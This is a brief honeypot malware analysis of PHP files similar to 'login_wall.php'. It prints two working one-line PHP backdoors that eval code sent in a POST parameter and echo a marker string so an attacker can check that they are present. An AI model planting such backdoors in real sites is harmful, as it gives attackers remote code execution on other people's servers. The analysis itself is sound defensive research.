These are instances of files similar to the login_wall.php
that my honey pots have caught over the years.
Unfortunately, I don't have origin IP address or method of download for these.
They just serve as examples that malware coders do a lot of copying.
Cleaning these PHP files by removing UTF-8 "byte order mark" (ugh, thanks Microsoft) carriage returns and trailing ASCII spaces on lines reveals them as nearly identical, differing only slightly in what HTTP parameter name the backdoor code uses.
Each of these strays has a simple PHP backdoor. Two different, but clearly related backdoors appear:
if($_GET["login"]=="cmd"){if($_POST['coco']==''){echo('->|OK|-<');exit();}eval($_POST['coco']);exit();}
if($_GET["login"]=="cmd"){if($_POST['123']==''){echo('->|OK|-<');exit();}eval($_POST['123']);exit();}
That's a little more than minimal backdooring. It can send back the string "->|OK|-<" if invoked without parameter value, so a miscreant can detect the presence of a backdoor before committing to sending valuable PHP malware code, and possibly revealing it to a defender.